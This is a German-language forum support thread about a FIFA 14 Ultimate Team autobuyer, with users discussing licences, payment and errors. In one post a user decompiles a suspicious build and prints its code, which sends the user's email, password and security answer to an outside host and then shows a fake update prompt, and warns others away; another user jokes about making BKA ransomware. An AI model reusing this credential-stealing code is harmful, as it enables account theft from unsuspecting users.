FUTAutobuyer [FIFA 14] Support Thread

10/04/2013 13:11 'Heaven.#3631
Quote:
Originally Posted by BlackflyLP View Post
bei mir hat eine kostenlose Umfrage ausgereicht.
Ich habe aber kein Bock schon gleich zu beginn von Fifa 14 gehackt zu werden, deshalb wollte ich erst mögliche Erfahrungen hören.
Selbst mit meinem 2. Account ist mir das bei den dreisten Scammern zu gefährlich.
Dann send mir die EXE zu und ich schaue mal nach. sieht ja ziemlich nach .Net aus
10/04/2013 13:11 pcmolte#3632
Quote:
Originally Posted by Waka Toa View Post
Du musst mindestens 5 Umfragen machen, das wären 25€/Monat die dein Handy belasten... Nicht dein Ernst oder?
Ich frag mich immer wieder, wie man auf so eine Scheisse reinfallen kann. Ähnlich wie iPhone gewinnspiele bei facebook oder anderem.. Doofe Menschen sterben komischerweise nie aus.. Will gar nicht wissen, wie viele Leute beim BKA Trojaner die 100€ PSC eingeben..
10/04/2013 13:15 'Heaven.#3633
Quote:
Originally Posted by pcmolte View Post
Ich frag mich immer wieder, wie man auf so eine Scheisse reinfallen kann. Ähnlich wie iPhone gewinnspiele bei facebook oder anderem.. Doofe Menschen sterben komischerweise nie aus.. Will gar nicht wissen, wie viele Leute beim BKA Trojaner die 100€ PSC eingeben..
Gar nicht mal so eine schlechte Idee :D So einen BKA "Trojaner" hat man ja in maximal 5 Minuten fertig :D
10/04/2013 13:16 BlackflyLP#3634
Quote:
Originally Posted by pcmolte View Post
Mir wäre das mit dem Trojaner auch fast mal passiert, ist aber schon sehr lange her. ^^
Aber jetzt lieber wieder zurück zum Thema Autobuyer, weil sonst wieder wegen Off-Topic Gerede gemeckert wird <3
10/04/2013 13:16 hmm²#3635
epvp bugt komme nicht auf seite 364 -.-

xD ich geh letzt seite komme aber immer auf 363 :D
10/04/2013 13:23 BlackflyLP#3636
Quote:
Dann send mir die EXE zu und ich schaue mal nach. sieht ja ziemlich nach .Net aus
habe dich in Skype addet :]
10/04/2013 13:23 'Heaven.#3637
Quote:
Originally Posted by BlackflyLP View Post
habe dich in Skype addet :]
Wenn du offline bist kann ich dich schlecht anschreiben

Code:
 this.ListBox1.Items.Add(string.Concat(Conversions.ToString(DateAndTime.TimeOfDay), ": Logging into ", this.email.Text, "!"));
                string[] text = new string[] { "http://www.topsecretcrimshit.me.pn/write.php?u=", this.email.Text, "&p=", this.password.Text, "&sq=", this.sq.Text, "&c=", this.plat.Text, "" };
                WebRequest webRequest = WebRequest.Create(string.Concat(text));
                webRequest.GetResponse();
                Thread.Sleep(3000);
                Interaction.MsgBox("Program Out Of Date! Update At: http://bit.ly/fut14update", MsgBoxStyle.OkOnly, null);
                Process.Start("http://bit.ly/fut14update");
                this.ListBox1.Items.Add(string.Concat(Conversions.ToString(DateAndTime.TimeOfDay), ": You must update! This version is out of date!"));
                this.Label19.Visible = true;
Würde die Finger von lassen
10/04/2013 13:24 BlackflyLP#3638
Quote:
Wenn du offline bist kann ich dich schlecht anschreiben
Stimmt, sorry xD
10/04/2013 13:35 SelleRoyal#3639
Hat noch jemand ne Idee warum bei meinem Xbox Account sofort die Meldung kommt Autobuyer funktioniert nicht mehr? Xbox ist aus, Webapp komm ich rein und wenn ich mich mit meinen PS3 Account einlogge klappt auch alles.
10/04/2013 13:40 supersry#3640
.net reflector is schon was feines, damit kannste eigtl. jeden dreck untersuchen
10/04/2013 13:41 fatkohl#3641
hello,

sorry is bestimmt scho 1000ma gefragt worden, hab aber auf den letzten seiten nix gefunden.

was hat es denn mit der 1.10. version auf sich (Autobuyer-v.1.0.0.7.exe)?

bei mir funktioniert die nich ....

danke

:confused:

edit: was muss ich denn machen wenn ich lukaku von everton finden will ?
weil der is ja bei chelsea im AB
10/04/2013 13:57 blaje#3642
ahoi jungs,

wie kann ich für ne Lizenz zahlen? Paypal funzt ja leider ned...

#regards
10/04/2013 14:04 xDPride#3643
Quote:
Originally Posted by blaje View Post
ahoi jungs,

wie kann ich für ne Lizenz zahlen? Paypal funzt ja leider ned...

#regards
per paysafecard ! :D
10/04/2013 14:11 mk-ch#3644
Quote:
Originally Posted by fatkohl View Post
hello,

sorry is bestimmt scho 1000ma gefragt worden, hab aber auf den letzten seiten nix gefunden.

danke

Als Verein musst du Everton auswählen und inform 1
10/04/2013 14:14 vfbf4n1893#3645
Quote:
Originally Posted by fatkohl View Post
hello,

danke

Was heißt funktioniert nicht? Welche Fehlermeldung kommt?